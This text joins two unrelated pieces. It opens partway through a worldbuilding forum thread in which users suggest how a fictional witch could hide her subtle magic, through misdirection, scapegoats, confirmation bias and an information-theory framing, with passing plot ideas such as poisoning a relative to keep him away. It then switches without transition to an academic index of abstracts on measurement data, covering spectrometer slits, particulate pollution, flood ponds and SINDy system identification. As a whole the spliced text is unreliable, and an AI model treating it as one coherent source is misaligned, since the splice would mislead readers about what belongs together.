In large cities people can do quite a lot while remaining part of an anonymous background. As in the example, your vulnerability is people making connections between events that in isolation are harmless. As long as you leave no paper trail when meddling, this is unlikely in a large city, provided individual interventions are not noticeable enough to be mentioned to others along with a complete description of that nice person who did not give her name.
If somebody or something else is grabbing people's attention, people will not even remember you were present. If you can act from a distance and mess with people's minds, this will be easy.
You can manipulate people into taking the necessary actions and grabbing the attention. Make somebody else go fishing on that lake without even saying a word, simply by tweaking the discussion they have with someone else. Make everyone forget you were there by having people skip mentioning you when first telling the story to their friends or the police.
## Make no patterns
Do not repeat the same action so often that it becomes a statistical anomaly. Do not spread your name around in the context of interventions. Vary your appearance enough to avoid creating an urban legend of a woman with red shoes or green hair or whatever. In a large city where people do not really know you, these will be a big help.
• Wow, choosing a winning answer will be hard. Lots of high-quality answers! – Serban Tanasa Mar 28 '15 at 1:45
The thing that trips you up here is what's called bias.
Specifically: Confirmation bias
Confirmation bias basically means that if someone says out loud "She's a witch!" then they will see a load of evidence to support this theory. The events where her powers were manifest will stand out.
It's actually very hard to avoid too - we have plenty of real-world examples of witch trials where enough 'evidence' was secured to convict, despite such evidence being only allegations and confessions under torture.
So I think what she would need to do is be extremely careful to act at a distance, and try and decouple the chain of events. People will notice her involvement in fortunate outcomes. This may be ok, they'll assume she's lucky, but they will notice 'something special'.
We get winning streaks on a daily basis that look 'lucky' but are merely the result of humans being really bad at handling 'random'.
So what would be needed is action at a distance and plausible deniability. Avoiding being present at fortunate events. Sabotaging things in advance - maybe the brewer is called out of town at short notice because a family member is unwell (poisoned), and that's nothing to do with her...
Healing done slowly and subtly - maybe outcomes are better overall, but anyone who makes a 'surprising' recovery will be treated with suspicion. This may, at extremes, mean letting someone die. But perhaps not - maybe it's possible to heal them slowly, hiding the fact that naturally they would have died.
## People Will Talk
Even without any evidence at all, people will attribute positive (or negative) events to magic - even in a world where magic doesn't exist. A lot of positive events will undoubtedly cast suspicion. When something happens that is statistically unlikely, people are more likely to assume that the 'winner' was cheating. Hiding would mean not being associated with any suspicious events.
## Life in a Glass House
Now, as long as everything always goes great, a witch would probably be safe; people wouldn't want to push their luck. Of course... it's almost impossible for everything to always go right. Sometimes even magic can't cure a disease or stop an accident, and when someone gets hurt, there will be no more safety net. It's probably already gone - that brewer may have kept his life, but he lost his livelihood. If the townsfolk are already talking, it's only a matter of time before the torches and pitchforks come out.
## So what now?
To keep her abilities hidden, Rynn needs to become a con artist. She needs to practice the art of redirection, of covering her true intentions with something that looks plausible. The townsfolk have associated all those events with her because she was there. What Rynn needs to do is:
• Stay away. If at all possible, don't be present. A thousand magical events in a thousand different situations (like a log magically floating out to the two drowning boys) are harder to put together than a thousand magical events with a single point of similarity. So, Rynn needs to stay out of sight as much as possible. If she were "out of town" while something happened, all the better.
• Redirect. A lot of trouble can be avoided by simply not being there; however, instead of it being Rynn herself making sure no one is there, she needs to get someone else to do it. Perhaps the brewer gets a message from the bank demanding a meeting, or his wife gets a bad cold so he's late to work; either way, there is no suspicion thrown on Rynn.
• Don't get greedy. It's easy to want the best in every situation, but "the best" also stands out like a sore thumb. Instead of ducking when a rock is thrown, Rynn should let it glance off her shoulder. Instead of the thieves returning her purse, they just 'accidentally' lose it, and someone else returns it to her (at which point she cries about the missing money, even if there wasn't any). Bad things keep happening, just not as bad as they could have been.
• Have a reason. Sure, Rynn's cookies cure kids; why wouldn't they? She puts some healing herbs from Farmer Brown's north pasture in them. Everyone knows those herbs cure anything. Instead of magically getting better, the kids get better because of Science!... even if it isn't science.
• Be friendly. It's one thing to accuse a stranger or an acquaintance, but it's another to accuse a close friend. The more friends Rynn has, the more potential allies she gains; down at the pub, when two men start talking about "that strange woman," her next door neighbor can casually chime in, defusing the situation.
• Ask favors. This actually has two benefits; first, a witch can do everything for herself, so someone asking for help probably isn't a witch. And second, asking someone for a favor actually causes them to trust you more.
## Specifics
All of this is, in the end, Headology. The more Headology, the better, in fact. If Rynn keeps tabs on the townspeople, and defuses tension before it can build, she will stay safe.
Telekinesis can be helpful for tiny nudges, but she shouldn't do anything obvious with it: untie a shoelace, but don't lift a boulder in the air. In fact, it would be better to use telekinesis to stop things from happening; no one notices when a rock doesn't roll down a hill.
Divination is the key to staying out of trouble, too; the longer she can see into the future, the better off she'll be. She could even test several methods of helping people before she actually tries them.
Evocation, on the other hand, would be dangerous, because it's highly visible, and almost impossible to pass off as a natural event. No newt-transfigurations or lightning bolts here! That's a sure-fire way to get your trial after your hanging.
• Very thorough answer! – Serban Tanasa Mar 28 '15 at 1:09
• "no one notices when a rock doesn't roll down a hill". Yes stopping things happening which no one was expecting anyway is almost perfectly hidden. – trichoplax Mar 28 '15 at 15:06
• Telekinesis would be most effective at the start of an action--before a ball leaves someone's hands, for example. Then the trajectory need not change. That requires constant divination. An alternative is to make sure people notice and just correctly avoid any dangers. Kid drowning? Make sure he notices the strong undercurrent and doesn't go swimming. Rock being thrown? Make sure the thrower's shoe and breath makes enough of a sound to draw attention, and that the targeted person correctly predicts how to dodge it. And so on. – Kimball Robinson Dec 1 '15 at 20:07
• Humans tend not to connect events separated by time, or when there is an easier explanation. She simply needs to avoid being around when the miracles occur, and there needs to be another explanation. Perhaps several other explanations. – Kimball Robinson Dec 1 '15 at 20:08
Rather than answer all the questions posed I'm going to focus on one aspect of this question:
How should a mage act to make him less likely to be detected?
They will have to let some bad things happen. Both to themselves, and to others. There are some actions they could take but even when people aren't magic, it only takes one or two coincidences for people to connect dots that may or may not be there, and call it witchcraft. Consider the Salem Witch Trials. No magic, and yet once someone claimed that their neighbor was a witch then others were willing to come forth to testify against them, having seen anomalies.
Humans are exceptional at noticing oddities, coincidences, correlations, etc.
Further, I don't think this is something they could do as a child and get away with it - in their youthful enthusiasm they would undoubtedly be discovered. Either the magic has to come very gradually once they gain enough understanding of the world to protect themselves, or they have to be trained by someone who knows their magic, or it has to be subconscious such that they aren't even aware that they are doing it, but still limited to avoid detection.
Lastly, you couldn't call "entire town trance" subtle, and outsiders would quickly notice something wrong, so I don't think this would apply to your question. But it's worth some consideration if your location is particularly secluded.
• "She turned me into a newt!!!" – user4239 Mar 26 '15 at 13:48
• @DVK "It's a fair cop." – Adam Davis Mar 26 '15 at 13:50
This is long, because I have had a great deal of fun exploring magic from an information theory perspective. There's a separator half way through for those who just want to read how Rynn should behave.
I would approach this from a key observation: others will observe the effects of Rynn's magic. If they don't, it makes for very poor magic. Something should happen. While it may seem like the secret to subtle magic is to make as "small" of a change as possible, a more precise wording is helpful: the secret to subtle magic is to do things in a way which is easily explained by The Unknown or to encourage others to not search for an explanation in the first place.
In science, The Unknown is modeled as random variables. However, The Unknown takes on many forms in other approaches to making sense of the world. The Norse might call it Loki's mischief. I've heard it called the devil's handiwork before. Whatever you call it, it represents that of the world which you did not measure, thus cannot predict its effects.
This approach is particularly convenient for modeling such subtle magic because it lends itself to an easy study using information theory. Assume we all have some information about the world. As we interact with it, we learn more. We also forget things which are of lower value (consider: the third letter of this paragraph is an 'i,' but you didn't think it was important enough to remember that, did you?)
To elicit a subtle magic effect is akin to being able to see the world in a different way. Consider the subtle magic of a teenager fixing their grandparents' computer. The way the grandparents view the world is valuable in many ways, but in the particular case of computers, their worldview is highly ineffective at solving problems. The teenager, having grown up with computers, can easily see the root causes of computer-related problems and find solutions. From the grandparents' point of view, what the teenager does is indistinguishable from a subtle magic. They simply cannot see enough information to explain why the teenager's approach yields success when theirs fails. All they can do is keep his or her number on speed dial and thank the stars that they don't have to solve these problems on their own.
Such a world view can be viewed as a body of information itself. The worldview is made up of many assumptions and patterns that have been useful in the past for understanding the world with as little effort as possible. Being information, it can be shared. This is where our teenager's plight differs from Rynn's. While the teenager would certainly love it if their grandparents figured out how to work a computer, Rynn has a vested interest in not letting them do so. If everyone could see the world the way she does, then they could predict her abilities in advance and effectively nullify them. She needs to keep this worldview secret. This leads to what I would call the first rule of keeping magic:
Magic must not "leak" information about how it approaches the world, or it becomes commonplace, just as the magic of flight is now a daily commute for many.
So how do we avoid leaks? There are three fundamental techniques I can identify:
• Don't emit any information.
• "Whiten" the leaked information to make it appear more like The Unknown before emitting it.
• Gather information that others do not know, and obscure the leaked information with it.
The first solution is easy. If you don't emit any information about your worldview, you are safe. However, this is very difficult in the face of science. Science is very good at collecting multiple datapoints and mining them for patterns. The one escape: do magic only once. In many magic systems we see the concept of someone getting to do a "miracle," but often they can only do one. The idea is that each person has something that makes them "them." Nobody else has it. If you are willing to give it up, you can do tremendous magic. However, afterwards, everyone knows that little bit that makes you "you." With that information, they can identify how you did the magic, and it ceases to be magic. However, in the case of miracles, the effect is already done. It occurred too fast to prevent the first time; all the world can do is prevent it from happening again.
The next two solutions both involve "whitening" the information to make it harder to discern from The Unknown. This process is easily seen in modern computer cryptography. Two individuals with a shared secret can communicate using an encryption which others cannot penetrate (such as AES). One way this can be applied to magic is if a founder of a magic school can split the magic into two parts which function similarly to public-key cryptography. The founder breaks the magic into a public and a private part. The public part is the one which does all of the work of magic, but it can only do it with the help of the private part. The private part contains the secret keys to the art, shared only between those in the school of magic and the source of the magic itself (perhaps the universe). When "casting a spell," the inner part allows for an interaction with the source of magic which appears to be noise unless you have the secret key. The source then provides you the power needed to complete the spell using the public part of the magic.
This pattern shows up in secret societies. When a magical group has secret rituals, they form the backbone of that inner "private" key. If you could observe those rituals, you could dismantle their power. They keep them secret. However, you see the outer "public" key, which is the powerful magics they wield (such as the ability to cause rain to fall).
Of course this has two fundamental ways to fall apart. The first is obvious: if the secret rituals are exposed, so is the root of their power (akin to Samson of the Bible having his hair cut). The second is more subtle: your power is only protected by how effectively your secret rituals actually guard your abilities. Consider the ENIGMA, which had the magical ability to protect German U-Boat movements until mathematicians in England figured out exploits to uncover the secret keys. Secrets get broken all the time.
The final solution in my list is to acquire information which is not known by anyone else, and use it to "whiten" the magical information. This has a dark side and a light side. The dark side is visible in many magic systems: the ability to take information by force. Sacrifices and blood thaumaturgy are examples of using something which has never been exposed to anyone else and using that to whiten the magic.
Before going onto the light side, I'd point out the middle ground you will find between them: chance. If your magic works if a coin flip is "heads" and fails if the coin flip is "tails," then it leaks 50% as much information with each usage.
The light side is to use only information which is given freely. Secrets, promises, locks of hair: these are often given as "payment" for magic. These contain enough information to obscure the magic from the world, making it appear Unknown.
The lightest of the light side is to use only information which is forgotten or left behind. Most people forget how many steps they took from the cab to the front door, or whether they turned the doorknob clockwise or counterclockwise to enter. This is enough to "whiten" very strong magic, so long as nobody ever catches on to how you're doing it.
So let's get to Rynn. How does Rynn remain undetected? Of all of the methods of obscuring magic, the only one which is reliably undetectable is to collect that which is forgotten. However, we run into a bit of an issue: nothing is ever truly forgotten. Someone may forget their hat, only to remember it and come back later. If she were to rely on such forgotten things, she would eventually be trapped.
There is one pattern that is demonstrably undetectable. Many interactions are not fully observable. Push on someone and it's hard to tell if they're just really light for their size, or if they helped you by moving with you instead of resisting. Shake someone's hand, and it is hard to tell if you are enthusiastic to meet them, or if they are enthusiastic to meet you; both cause the handshake to pump up and down the same. In these situations, each party only observes at most half of the information in total. The other half is free to be used for whitening.
Now eventually someone will catch on. After all, you only get lucky so many times. Someone will eventually figure out what Rynn is doing if she's not careful. She needs a second layer of defense - one which your description captured perfectly. She needs people to want to believe she's just lucky. Accordingly, she needs to seek out win-win situations, where she benefits and the other party benefits. Hence the curious tendency for people to just get better around her. This would result in a tendency for people to begin to migrate towards her instinctively.
Eventually people do realize there's something special about her, but if they are comfortable enough with that level of specialness, they won't pry. (Interestingly enough, this is a strong in-character corollary to Sanderson's First Law of Magic, "The ability for an author to use magic to resolve conflict is directly proportional to how much the reader understands it.")
Now for actions. These are the interesting part. Consider that an ill-worded answer to a sharply phrased question could reveal a little of her magic. Too many such answers could box her in, forcing her to reveal more than she wants to. She would have a strong tendency to avoid giving answers to sharp questions - ideally by misdirecting away from them, but she would resort to vague answers if needed. Her actions would be similarly vague. If people are naturally attracted to her, she would need to be able to move agilely to avoid being smothered by them (physically and socially).
The rest of society can help. Attitudes such as "do what you will, may it harm none" would allow much more room for Rynn to do extraordinary things without bothering people. Scientific thought would be the most difficult attitude for her to cope with. Scientists would constantly be trying to fix the variables she needs to whiten her magic. One strong sign of this would be people asking for repeat performances of previous magic (to which she would respond by never doing exactly the same thing twice; each magic would be tailored to its circumstances). A fear of The Unknown could result in a violent confrontation with Rynn, for her power depends on the ability to blend in with The Unknown. If it, itself, is hated, then blending in is much less useful.
Your background evokes a society full of superstitious folk, who would suspect magic even when it isn't there. So I think no matter what Rynn did, people in that town would believe she was a witch, even if they had no evidence, and in fact, probably even if she wasn't. They would want to protect her, to turn a blind eye, because she is kind and helpful, so she could actually get away with an awful lot - so long as it didn't harm people, or make it seem like she could read their thoughts or control their actions.
Now, I was thinking: into this kind of society, bound to suspect magic even in non-magical healings, you could introduce a character who explains everything with science. Someone who shows how the tricks are done (in fact, does those tricks themselves), and defrauds imposters. Someone with a Sherlock Holmes ability to read people, a medical background, an interest in mechanics, and a good head on their shoulders in times of great pressure. Working together like Penn and Teller, everyone would be looking at the showy magician while Rynn was quietly doing the magic. Occasionally the magician "explains how it was done".
In this situation - you could get away with EVERYTHING.
• The more they believed in her, the greater the temptation to think that bad things that she could not avert were intentional acts on her part. Thus the witch label comes again. – Oldcat Mar 26 '15 at 17:53
• That's why I think it is important for her to acquire a foil. Suspicion will happen no matter what otherwise. If not a foil, a powerful protector. – Kristy Mar 28 '15 at 4:01
If you wanted a magic that was indistinguishable from luck but consistently in your favour, I think the magical ability you would need would be to see alternate outcomes of an event and to pick which outcome occurs. If you were to subscribe to the many-worlds theory this would be a matter of picking out which world you are in following any specific event.
This is quite an interesting idea as a form of magic, guiding the world towards the outcomes you desire by nudging the causal chain of events that would otherwise fall out randomly. Perhaps there is a certain maximum probability that someone with this ability would not be able to exceed.
It also opens the door for a certain irony in your storytelling: the ability to foresee the consequences of events in the short term might well lead to unforeseen consequences in the longer term, and there would probably be greater risks in affecting causality more strongly; all kinds of butterfly-effect-style chaotic outcomes are on the cards.
The same way they audit casinos to ensure that the games are as specified (I wouldn't call them fair). Adding up day-to-day events is fraught with bias. You need to pair events with those occurring to other people, and choose things for which you can obtain clear results, rather than fuzzy subjective judgements.
Given that, statistics are well understood and used in science for exactly this purpose. Five sigma is the standard for discovering the Higgs boson, as opposed to coincidences and random jitter.
But, by whatever means would be possible for normal phenomena, her talent would work to prevent being discovered. If you were going to be suspicious, she would just happen to avoid you, or you would start to miss seeing the events.
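To make the auditing idea concrete, here is a toy sketch (all numbers invented for illustration) of how many standard deviations a run of "luck" would sit above chance, using a simple binomial model:

```python
# Toy binomial z-score: how anomalous is Rynn's run of fortunate outcomes
# compared with the townsfolk's base rate? Numbers are purely illustrative.
from math import sqrt

def luck_sigmas(successes, trials, base_rate):
    """Standard deviations above chance for a given success count."""
    expected = trials * base_rate
    sd = sqrt(trials * base_rate * (1 - base_rate))
    return (successes - expected) / sd

# 19 fortunate outcomes out of 20 close calls, versus a 50% base rate:
print(luck_sigmas(19, 20, 0.5))  # ~4.0 sigma: suspicious, but short of the
                                 # five-sigma "discovery" standard above
```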
I love the idea that magic itself has a mysterious cognizance. That the protection afforded is not specifically controlled by the conjurer/subject, but by some other unknown force. Piers Anthony used that concept once: a character had the magical quality of silent protection; to protect itself, the ability prevented detection by others, through no action by the character. The character didn't even realize the quality existed for most of the novel.
So, using the OP's example, Rynn would act to tie her shoelaces right then. Not because she knew the rock was coming, but because she just happened to notice and the timing was perfect. So I suppose that's a form of Evocation, but with a twist?
One interesting way to think of the magic would be the ability to sense and manipulate luck itself, with the caveat that she can't create luck, just transfer it. That would both explain the need to keep it subtle and why she can't just eliminate all traces.
Perhaps without Rynn's intervention the fermentation vat accident would have severely burned the brewer, but done little damage to his property. She traded off the good luck of avoiding injury with the bad luck of extensive property damage. She doesn't stop the boys from going swimming in the first place, because that would require an unacceptable expenditure of bad luck somewhere else. The orphanage donation may have been made possible by the naturally-accumulated bad luck of the orphans. The sick children accidentally got caught in some crossfire of a luck transfer, so Rynn corrected it when she was able. The cookies had nothing to do with the magic, but were made by way of apology.
The climax of the story could involve some spectacular feat of magic that everyone agrees is necessary, but comes at great cost.
• Very interesting! – Serban Tanasa Mar 28 '15 at 1:07
If magic/witchcraft was real, then Rynn's brand of magic would be much closer to the truth than Harry Potter, or any witchcraft in popular culture.
Is she really a witch, or just some crafty old lady? If someone snuck up behind her and threw a rock, did she know they were there the whole time and anticipate the rock being thrown, or did she really have magical powers?
Maybe she really did cast a spell on the cookies to magically make the children feel better, or perhaps she used herbs or some other natural ingredients which made their little tummies feel better instead.
The bottom line is that there should be some kind of scientific explanation for her actions. It might not be immediately obvious, but it might make sense with an explanation at a later date.
In the Middle Ages educated intelligent people needed to stay away from the limelight or risk being executed or jailed. Religious dogma ruled far and wide, and intelligent people were persecuted by the church for heresy and witchcraft for simply knowing too much, or going against the norms of that culture.
Throughout Europe during those times, much of the ancient knowledge was lost. It would take centuries to undo the damage done during this period. Countless books were burned, and scientific research came close to a standstill. Change was not embraced, and not much changed technologically during that period.
Rynn could be a modern-day throwback to the idea that there were still intelligent people in the Middle Ages, but they more or less kept to themselves for fear of persecution. She could live in an area in the Bible Belt that is very resistant to change, and she would rather keep to herself than deal with the locals. To keep people away, she could have built a reputation for being a witch. This could be a combination of strange happenings which are true and others which are made-up stories to keep the people confused. She will always try to keep at least a few steps ahead of everyone else to keep this going as much as possible.
Or.. perhaps she really is a witch after all. The choice is yours.
Belated answer: consider adding a scapegoat. Something else that is 'lucky', and not Rynn.
Have someone find something one day that is unique and convince everyone that it is lucky. Get them to believe that as long as they take care of the object good luck will happen, that they need to value it.
When something bad happens to the object, temporarily make lots of minor (nothing too harmful) bad luck happen around town. The sort of annoyances that stick out in our heads but don't really do any long-term harm. Then help everyone do something to make 'right' whatever was done wrong, so they can get their good luck back.
This way people will associate the good luck with the object, not Rynn. Their own confirmation bias will ensure everything gets credited to the object. Now anyone who does have a tendency to think twice about their good fortune knows what to credit and doesn't look for a second candidate.
After a while, once everyone has firmly decided the object is special, Rynn can claim to be helping take care of it, and in so doing explain that any good luck that happens near her is just the object acting through her to bring good fortune.
This is a general overview; there are lots of similar approaches to the same idea. The key thing is to give an alternate explanation for the source of their good luck. She still needs to work indirectly, but she can gain some additional leeway. The biggest way to make this work is to have something take away the luck every now and then when something happens to the object, but in a way the townsfolk can easily fix, so that there is a quick cause-and-effect relationship to confirm their belief that the object causes the luck.
Dilution is the solution to pollution.
Rynn does the magic stuff. She does lots and lots of other stuff too. She is active in city politics and in her church. She is a relentless volunteer and organizer. She attends rallies and protests. She coordinates public art. She advocates for her community at the state and sometimes even national level.
She is not a loudmouth but she is everywhere - a fixture of the city. So when the kids feel better after eating her oatmeal cookies that is diluted out by the kid who got bit by a dog after eating her oatmeal cookies, or the kid who got picked up by the cops for shoplifting after eating her oatmeal cookies. It is no surprise that she helped those kids at the lake; it is not uncommon to see her there with her friends picking up the park or even going for a swim.
Her magical deeds are diluted out in a sea of ordinary and even extraordinary deeds. It is possible that all her deeds are leavened with subtle magic. People chalk it up to her green eyes.
I would offer a two-pronged answer:
1: How many uncanny apparent coincidences could a character get away with?
2: Even or especially if she has unearthly charisma, she's in a danger zone; people at extremes of privilege can experience Wagon, Blackbird, Saab effects.
Blackbird effects, unlike the way the story is told, begin well, well, well before people say, "This has to be supernatural!"
There are a lot of very good and complete answers and I don't want to write a wall of text just to repeat what others have already said.
Some have mentioned the need to divert (on a long enough time frame) attention away from her in regard to all the lucky events happening around her and the village. Obviously she doesn't want to stop being a witch (stop using magic) just to protect herself from bias and lack of understanding. But if she were to realize the danger, I think it would be fairly easy for her to cast the reason for the town's luck onto pretty much anything she wants. (An old tree in the village square was saved after some controversy, and following the decision to keep it, an abnormal amount of luck occurred all over the place, etc.)
Symbols hold great strength. And while the children might still whisper in corners that she does magic and all that, adults will easily dismiss them because the village is lucky because of [Insert event or Symbol, Statue etc..], not the sweet girl/woman who is so shy and caring. (How dare you accuse her of such a thing - nothing wrong with a magic fountain though.)
|
# measurement data: Recently Published Documents
## TOTAL DOCUMENTS
5174 (five years: 2726)
## H-INDEX
55 (five years: 20)
2022 · Vol 167 · pp. 108542 · Author(s): Tianqi Gu, Hongxin Lin, Dawei Tang, Shuwen Lin, Tianzhi Luo
2022 · Vol 204 · pp. 107691 · Author(s): Xueping Li, Shengli Wang, Zhigang Lu
2022 · Author(s): Ye Xiaoming, Ding Shijun, Liu Haibo
Abstract. In traditional measurement theory, precision is defined as the dispersion of the measured value and is used as the basis for calculating weights in the adjustment of measurement data of different qualities, which leads to the trouble that trueness is completely ignored in the weight allocation. In this paper, following the pure concepts of probability theory, the measured value (observed value) is regarded as a constant, the error as a random variable, and the variance as the dispersion of all possible values of an unknown error. Thus, a rigorous formula for weight calculation and variance propagation is derived, which resolves the theoretical difficulty of determining the weight values in the adjustment of multi-channel observation data of different qualities. The results show that the optimal weights are not only determined by the covariance matrix of the observation errors, but are also related to the adjustment model.
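For orientation, the classical inverse-variance weighting result that this line of work revisits is stated below; this is standard background, not the paper's new formula.

```latex
% Classical background only; the paper's own derivation is not reproduced here.
% For independent observations y_i of one quantity with error variances
% \sigma_i^2, the minimum-variance weighted mean is
\hat{x} = \frac{\sum_i w_i\, y_i}{\sum_i w_i}, \qquad
w_i = \frac{1}{\sigma_i^2}, \qquad
\operatorname{Var}(\hat{x}) = \Bigl(\sum_i \tfrac{1}{\sigma_i^2}\Bigr)^{-1}.
% With correlated errors (covariance matrix \Sigma) and design matrix A,
% generalised least squares gives
\hat{x} = \bigl(A^{\mathsf{T}} \Sigma^{-1} A\bigr)^{-1} A^{\mathsf{T}} \Sigma^{-1} y.
```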
Author(s): Timon Hummel, Claude Coatantiec, Xavier Gnata, Tobias Lamour, Rémi Rivière, ...
Abstract. The measurement accuracy of recent and future space-based imaging spectrometers with a high spectral and spatial resolution suffers from the inhomogeneity of the radiances of the observed Earth scene. The Instrument Spectral Response Function (ISRF) is distorted due to the inhomogeneous illumination from scene heterogeneity. This gives rise to a pseudo-random error on the measured spectra. In order to assess the spectral stability of the spectrograph, stringent requirements are typically defined on the ISRF, such as shape knowledge and the stability of the centroid position of the spectral sample. The high level of spectral accuracy is particularly crucial for missions quantifying small variations in the total column of well-mixed trace gases like $\text{CO}_2$. In the framework of the $\text{CO}_2$ Monitoring Mission (CO2M) industrial feasibility study (Phase A/B1 study), we investigated a new slit design called the 2D-Slit Homogenizer (2DSH). This new concept aims to reduce the Earth scene contrast entering the instrument. The 2DSH is based on optical fibre waveguides assembled in a bundle, which scramble the light in the across-track (ACT) and along-track (ALT) directions. A single fibre core dimension in ALT defines the spectral extent of the slit, and the dimension in ACT represents the spatial sample of the instrument. The full swath is given by the total size of the adjoined fibres in the ACT direction. In this work, we provide experimental measurement data on the stability of a representative rectangular-core fibre as well as a preliminary pre-development of a 2DSH fibre bundle. In our study, the slit concept has demonstrated significant performance gains in the stability of the ISRF for several extreme high-contrast Earth scenes, achieving a shape stability of $<0.5\%$ and a centroid stability of $<0.25\ \text{pm}$ (NIR). Given this unprecedented ISRF stabilization, we conclude that the 2DSH concept efficiently desensitizes the instrument to radiometric and spectral errors with respect to the heterogeneity of the Earth scene radiance.
2022 · Vol 12 (1) · pp. 102 · Author(s): Reizo Kato, Masashi Uebe, Shigeki Fujiyama, Hengbo Cui
A molecular Mott insulator β′-EtMe3Sb[Pd(dmit)2]2 is a quantum spin liquid candidate. In 2010, it was reported that the thermal conductivity of β′-EtMe3Sb[Pd(dmit)2]2 is characterized by its large value and gapless behavior (a finite temperature-linear term). In 2019, however, two other research groups reported opposite data (a much smaller value and a vanishingly small temperature-linear term), and the discrepancy in the thermal conductivity measurement data emerged as a serious problem concerning the ground state of the quantum spin liquid. Recently, the cooling rate was proposed as an origin of the discrepancy. We examined the effects of the cooling rate on electrical resistivity, low-temperature crystal structure, and 13C-NMR measurements and could not find any significant cooling-rate dependence.
2022 · Vol 13 (1) · pp. 120 · Author(s): Haoran Zhai, Jiaqi Yao, Guanghui Wang, Xinming Tang
Based on measurement data from air quality monitoring stations, the spatio-temporal characteristics of the concentrations of particles with aerodynamic equivalent diameters smaller than 2.5 and 10 μm (PM2.5 and PM10, respectively) in the Beijing–Tianjin–Hebei (BTH) region from 2015 to 2018 were analysed at yearly, seasonal, monthly, daily and hourly scales. The results indicated that (1) from 2015 to 2018, the annual average values of PM2.5 and PM10 concentrations and the PM2.5/PM10 ratio in the study area decreased each year; (2) the particulate matter (PM) concentration in winter was significantly higher than that in summer, and the PM2.5/PM10 ratio was highest in winter and lowest in spring; (3) the PM2.5 and PM10 concentrations exhibited a pattern of double peaks and valleys throughout the day, reaching peak values at night and in the morning and valleys in the morning and afternoon; and (4) with the use of an improved sine function to simulate the change trend of the monthly mean PM concentration, the fitting R2 values for PM2.5 and PM10 in the whole study area were 0.74 and 0.58, respectively. Moreover, the high-value duration was shorter, the low-value duration was longer, and the concentration decrease rate was slower than the increase rate.
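As a rough illustration of the kind of fit described, here is a hedged Python sketch. The authors' exact "improved sine function" is not given in the abstract, so a phase-shifted annual sinusoid with a linear year-to-year decline is assumed, and the monthly data below are synthetic stand-ins:

```python
# Hedged sketch of fitting a seasonal sine-type trend to monthly PM2.5 means.
# Functional form and all numbers are illustrative assumptions.
import numpy as np
from scipy.optimize import curve_fit

def seasonal_trend(t, amp, phase, offset, slope):
    # annual cycle (period 12 months) on top of a linear decline
    return amp * np.sin(2 * np.pi * t / 12 + phase) + offset + slope * t

months = np.arange(48)  # Jan 2015 .. Dec 2018
rng = np.random.default_rng(0)
pm25 = (70 - 0.5 * months + 25 * np.cos(2 * np.pi * months / 12)
        + rng.normal(0, 5, months.size))  # winter-peaking, slowly declining

params, _ = curve_fit(seasonal_trend, months, pm25, p0=[20, 0, 60, -0.3])
residuals = pm25 - seasonal_trend(months, *params)
r2 = 1 - residuals.var() / pm25.var()
print(f"fitted params: {params}, R^2 = {r2:.2f}")
```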
2022 · Vol 12 (2) · pp. 729
Due to the recent increase in the intensity of rainstorms, the Japanese government has announced a new policy of flexible flood-mitigation measures that presupposes the release of water volumes exceeding the river channel capacity onto floodplains. However, because quantitative measurement data on excess runoff are limited, it will take time to formulate planning standards for remodeling and newly constructing flood-control facilities that are reasonable under current budgetary constraints. In this study, the capacity shortage of a flood detention pond was evaluated against the excess runoff from a severe 2019 flood event by combining the fragmentary measurement data with a numerical flow simulation. Although the numerical model was a rather simple one, commonly used for rough estimation of inundation areas in Japan, the results were overall consistent with the observations. Next, in accordance with the new policy, an inexpensive remodeling of the detention basin, which was designed according to conventional standards, was simulated; the upstream side of the surrounding embankment was removed so that excess water flowed up onto the floodplain gradually. Numerical experiments using the simple model indicated that the proposed remodeling increased the effectiveness of flood control remarkably, even for floods greater than the 2019 flood, without much inundation damage to upstream villages.
2022 · Vol 12 (2) · pp. 747 · Author(s): Yaxiong Ren, Tobias Melz
In recent years, the rapid growth of computing technology has enabled identifying mathematical models for vibration systems using measurement data instead of domain knowledge. Within this category, the method Sparse Identification of Nonlinear Dynamical Systems (SINDy) shows potential for interpretable identification. Therefore, in this work, a procedure of system identification based on the SINDy framework is developed and validated on a single-mass oscillator. To estimate the parameters in the SINDy model, two sparse regression methods are discussed. Compared with the Least Squares method with Sequential Threshold (LSST), which is the original estimation method from SINDy, the Least Squares method Post-LASSO (LSPL) shows better performance in numerical Monte Carlo Simulations (MCSs) of a single-mass oscillator in terms of sparseness, convergence, identified eigenfrequency, and coefficient of determination. Furthermore, the developed method SINDy-LSPL was successfully implemented with real measurement data of a single-mass oscillator with known theoretical parameters. The identified parameters using a sweep signal as excitation are more consistent and accurate than those identified using impulse excitation. In both cases, there exists a dependency of the identified parameter on the excitation amplitude that should be investigated in further research.
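For readers unfamiliar with SINDy, the following is a minimal sketch of the sequential-thresholded least-squares estimator (the LSST variant named above) applied to a simulated single-mass oscillator. The candidate library, parameter values, and simulated data are illustrative assumptions, not taken from the paper:

```python
# Minimal SINDy-style sequential thresholded least squares, demonstrated on
# a damped single-mass oscillator x'' = -(k/m) x - (c/m) x'
# with m = 1, c = 0.2, k = 4.01 (illustrative values).
import numpy as np

def sindy_lstsq_threshold(Theta, dXdt, threshold=0.1, n_iter=10):
    """Solve Theta @ Xi ~= dXdt, repeatedly zeroing small coefficients."""
    Xi = np.linalg.lstsq(Theta, dXdt, rcond=None)[0]
    for _ in range(n_iter):
        small = np.abs(Xi) < threshold
        Xi[small] = 0.0
        for j in range(dXdt.shape[1]):           # refit only the active terms
            big = ~small[:, j]
            if big.any():
                Xi[big, j] = np.linalg.lstsq(Theta[:, big], dXdt[:, j],
                                             rcond=None)[0]
    return Xi

# Simulated measurement data: x(t) = exp(-0.1 t) cos(2 t)
t = np.linspace(0, 10, 2000)
x = np.exp(-0.1 * t) * np.cos(2 * t)
v = np.gradient(x, t)                            # numerical derivatives
a = np.gradient(v, t)

# Candidate library of terms: [x, v, x^2, x*v, v^2]
Theta = np.column_stack([x, v, x**2, x * v, v**2])
Xi = sindy_lstsq_threshold(Theta, a.reshape(-1, 1), threshold=0.05)
print(Xi.ravel())  # expect roughly [-4.01, -0.2, 0, 0, 0]
```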
2022 · Author(s): Alex Dornburg, Katerina Zapfe, Rachel Williams, Michael Alfaro, Richard Morris, ...
